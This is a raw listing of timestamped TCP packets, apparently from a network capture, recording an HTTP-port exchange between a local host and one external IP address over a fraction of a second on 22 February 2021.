Feb 22, 2021 09:13:24.424833059 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.425785065 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.425812006 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.425960064 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.427042961 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.427069902 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.427572966 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.432430029 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.432455063 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.432550907 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.433250904 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.433269978 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.433311939 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.434151888 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.434170961 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.434232950 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.435412884 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.435434103 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.437423944 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.458309889 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.458334923 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.458556890 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.459384918 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.459403992 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.460124016 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.460143089 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.460160017 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.460201025 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.461215973 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.461231947 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.461406946 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.462865114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.462897062 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.463666916 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.463697910 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.463721037 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.463814974 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.464848042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.464881897 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.464953899 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.466053963 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.466082096 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.466142893 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.467247963 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.467267036 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.467300892 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.468413115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.468430996 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.468483925 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.470607996 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.470628023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.470808029 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.471204996 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.471223116 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.472275019 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.472440004 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.472456932 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.472850084 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.473622084 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.473654985 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.473700047 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.475070953 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.475092888 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.475534916 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.476182938 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.476201057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.476234913 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.477222919 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.477253914 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.477361917 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.478192091 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.478223085 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.478249073 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.479239941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.479271889 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.479340076 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.485430956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.485471964 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.485544920 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.486061096 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.486090899 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.486269951 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.487018108 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.487046957 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.487082005 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.487386942 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.487418890 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.487493992 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.490242004 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.490277052 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.490339994 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.511373043 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.511403084 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.511503935 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.512887001 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.512914896 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.513259888 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.513283968 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.513305902 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.513425112 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.514134884 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.514168024 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.514475107 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.516479969 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.516513109 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.516663074 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.516872883 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.516897917 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.516944885 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.517656088 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.517688036 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.518162012 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.518928051 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.518955946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.519084930 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.520014048 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.520042896 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.520626068 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.521188974 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.521219015 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.521397114 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.523565054 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.523598909 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.523725986 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.525006056 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.525046110 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.525131941 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.525522947 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.526431084 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.526462078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.526633978 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.526640892 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.528274059 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.528301001 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.528453112 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.528639078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.528667927 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.528821945 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.530108929 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.530141115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.530216932 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.530956030 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.530987024 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.531049967 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.532058001 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.532085896 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.532150030 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.532440901 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.532469988 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.532536030 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.538537979 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.538585901 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.538691998 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.538825035 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.538855076 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.539325953 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.539623022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.539653063 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.539737940 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.540390968 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.540421009 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.540997982 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.541168928 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.541196108 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.541312933 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.541950941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.541984081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.542764902 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.542793989 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.542815924 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.543092012 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.543504000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.543538094 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.543813944 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.544260979 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.544292927 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.544980049 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.545047998 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.545078993 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.545149088 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.545825005 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.545851946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.545960903 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.546623945 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.546653032 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.546731949 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.547369957 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.547399044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.547496080 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.548149109 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.548177958 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.548396111 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.548927069 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.548965931 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.549120903 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.549714088 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.549746990 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.549828053 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.550493002 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.550527096 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.550625086 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.551264048 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.551289082 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.551453114 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.552057981 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.552093029 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.552175999 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.552808046 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.552843094 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.552932978 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.553587914 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.553623915 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.553699970 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.554331064 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.554354906 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.554454088 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.555149078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.555186033 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.555515051 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.555932045 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.555963993 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.556031942 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.556696892 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.556726933 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.557404041 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.564347029 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.564388037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.564593077 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.566083908 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.566123009 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.566591024 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.567202091 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.567239046 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.567312002 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.569365025 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.569421053 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.569715023 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.569715023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.569747925 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.569806099 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.570868015 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.570905924 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.570977926 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.571237087 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.571270943 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.571346998 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.573353052 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.573421001 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.573574066 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.573713064 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.573740959 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.573807955 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.576472044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.576508045 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.576642990 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.577934027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.577974081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.578092098 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.579376936 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.579410076 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.579510927 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.579719067 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.579758883 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.579878092 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.581190109 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.581222057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.581299067 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.581607103 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.581634045 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.582923889 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.582954884 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.582978964 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.583734035 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.583766937 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.583787918 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.584908962 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.584943056 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.584965944 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.585274935 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.585304022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.585325003 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.586927891 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.591532946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.591581106 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.591720104 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.592103958 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.592137098 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.592258930 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.592523098 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.592556953 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.592660904 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.593767881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.593802929 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.593883038 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.594074965 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.594100952 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.594211102 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.595575094 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.595608950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.595684052 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.595884085 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.595915079 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.596388102 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.596565008 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.596600056 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.596664906 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.597803116 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.597836018 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.598124027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.598150015 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.598154068 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.598176003 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.598267078 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.599137068 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.599172115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.599198103 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.599214077 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.599734068 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.600064039 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.600096941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.600119114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.600508928 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.601070881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.601102114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.601125002 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.601161957 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.601206064 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.602018118 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.602054119 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.602077961 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.602154970 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.602968931 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.603168964 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.603251934 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.603276014 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.603302002 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.603378057 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.604129076 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.604166031 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.604188919 CET	80	49733	104.21.71.230	192.168.2.4
